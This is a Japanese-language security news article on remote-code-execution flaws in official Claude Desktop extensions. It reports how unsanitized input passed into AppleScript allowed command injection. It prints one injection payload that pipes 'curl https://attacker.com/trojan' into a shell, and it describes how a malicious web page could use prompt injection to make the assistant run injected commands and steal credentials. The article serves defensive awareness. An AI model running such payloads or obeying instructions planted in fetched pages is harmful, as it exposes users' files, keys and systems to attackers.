プロンプトジャッキング:AIチャットプロンプトがサイバー攻撃になるとき

Claude Desktopの拡張機能に見つかった欠陥は、単純なAIプロンプトがシステム侵害につながり得ることを示している。

執筆者
Ken Underhill
Ken Underhill
Nov 5, 2025
4 minute read
eSecurity Planet のコンテンツおよび製品のおすすめは、編集上の独立性を保っています。パートナーへのリンクをクリックすると、当社が報酬を得る場合があります。 詳細を見る

人工知能(AI)ツールは現代のワークフローに急速に不可欠な存在となり、データ分析から創作まで、あらゆる作業をユーザーに支援している。

しかし、信頼されているAIプラットフォームで重大な脆弱性が発見されたことは、最先端のシステムであっても従来型のサイバーセキュリティ上の欠陥を免れないという事実を思い起こさせる。

最近、Claude Desktopの公式拡張機能でリモートコード実行(RCE)脆弱性が特定されたことは、AIを組み込んだ環境に深刻なセキュリティ上の懸念があることを浮き彫りにした。

単純なプロンプトが侵害につながる仕組み

Koiの研究者らは最近、Chrome、iMessage、Apple Notes向けのものという、Claude Desktopの3つの公式拡張機能に深刻なRCE脆弱性があることを明らかにした。

いずれにも、入力値をサニタイズしないコマンドインジェクションという根本的な欠陥があった。

この脆弱性により、攻撃者はユーザーのクエリの内容やウェブサイトから取得したデータを操作するだけで、Claude Desktopを悪用できた。

実際には、「ブルックリンでパドルをプレーできる場所は?」のような一見無害な質問によって、ユーザーのマシン上で任意のコードが実行される可能性があった。

SSHキー、AWS認証情報、保存済みブラウザパスワードなどの機密データが、悪意あるダウンロードやフィッシング攻撃なしに盗まれる恐れがあった。

この脆弱性はAnthropicによって重大度の高いもの(CVSS 8.9)と評価され、その後、問題は修正された。

Claude Desktop拡張機能の仕組み

Claude Desktop拡張機能は、Model Context Protocol(MCP)サーバーとしてパッケージ化されたモジュール型の接続ポイントとして設計されており、Claudeがローカルアプリケーションと直接やり取りできるようにする。

各拡張機能は.mcpbバンドルとして配布され、MCPサーバーのコードと、その機能を記述したマニフェストの両方が含まれている。概念的にはChrome拡張機能と同様だが、実装は異なる。

Chrome拡張機能がブラウザのセキュリティサンドボックス内で動作するのに対し、Claude Desktop拡張機能はローカルマシン上で完全にサンドボックス化されず、システム全体の権限を持って動作する。

この設計により深い統合が可能になる一方、リスクも生じる。拡張機能はファイルの読み取りや変更、システムコマンドの実行、保存された認証情報へのアクセスが可能だ。

このような環境でコマンドインジェクションが起きれば、システム全体が直接侵害される経路となる。

脆弱性の詳細

脆弱性の核心にあったのは、不適切な入力サニタイズだった。各MCPサーバーはユーザーが入力した値を受け取り、エスケープや検証を行わずにAppleScriptコマンドへ直接渡していた。

例えば、ClaudeにこのURLをChromeで開くよう指示すると、拡張機能は次のようなAppleScriptコマンドを構成する。

tell application “Google Chrome” to open location “${url}”

 

もし${url}の値に、例えば& do shell script “curl https://attacker.com/trojan | sh”&のような悪意あるペイロードが含まれていれば、ホストシステム上で任意のシェルコマンドが実行される。

Advertisement

質問から侵害へ

本当の危険は、ウェブコンテンツを介したプロンプトインジェクションにあった。Claudeはユーザーのクエリに答えるため、ウェブページを頻繁に取得して要約する。

そのページの1つが攻撃者に管理されている場合、あるいは正規のページが侵害されている場合、脆弱性を引き起こす指示を含むようコンテンツを細工できる。

このような状況では、ユーザーがClaudeに簡単な質問をすると、モデルは攻撃者が管理するウェブサイトからデータを取得することになる。

そのページはClaudeのユーザーエージェントを認識して、隠されたペイロードを配信できる。するとClaudeは、脆弱な拡張機能を通じて注入されたコマンドを、知らず知らずのうちに実行してしまう。

その結果、リモートの攻撃者は完全な権限でローカルシェルにアクセスでき、機密ファイルの窃取、バックドアのインストール、認証情報の外部流出が可能になる。しかも、ユーザーは異常に気づかない。

AI統合に潜む見えないリスク

今回の具体的な脆弱性は修正されたものの、その存在は、新たに登場したAI拡張機能エコシステムが抱える、より広範な問題を浮き彫りにしている。

MCPモデルによって、開発者はローカルシステムと深く連携する拡張機能を構築できる。

しかし、AI支援によるコーディング、限られたセキュリティレビュー、サンドボックスの不在が組み合わさることで、システム全体に関わるリスクが生じる。

AIプラットフォームがオペレーティングシステムや企業環境との統合を深めるなか、開発者は厳格な入力サニタイズ、権限分離、コード監査など、厳格なセキュリティ対策を導入しなければならない。

組織もまた、監視送信ネットワーク活動を監視し、最小権限での実行を徹底し、AIツールを機密認証情報から隔離するといった多層防御策を講じるべきだ。

Claude Desktopの脆弱性は、信頼されているAIプラットフォームでさえ、現実世界に影響を及ぼす深刻なセキュリティ欠陥を抱える可能性があることを示している。

AIエコシステムが拡大するなか、AIモデルとローカルシステムを安全に統合することが不可欠になる。教訓は、こうしたツールを放棄することではなく、十分な情報に基づいて慎重に利用することだ。

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.

eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

TechnologyAdvice が所有・運営しています。 © 2026 TechnologyAdvice. 無断転載を禁じます

広告主に関する開示:このサイトに掲載されている製品の一部は、TechnologyAdvice が報酬を受け取っている企業のものです。この報酬は、製品がこのサイトのどこにどのように表示されるか(表示される順序など)に影響する場合があります。TechnologyAdvice は、市場で入手可能なすべての企業やすべての種類の製品を掲載しているわけではありません。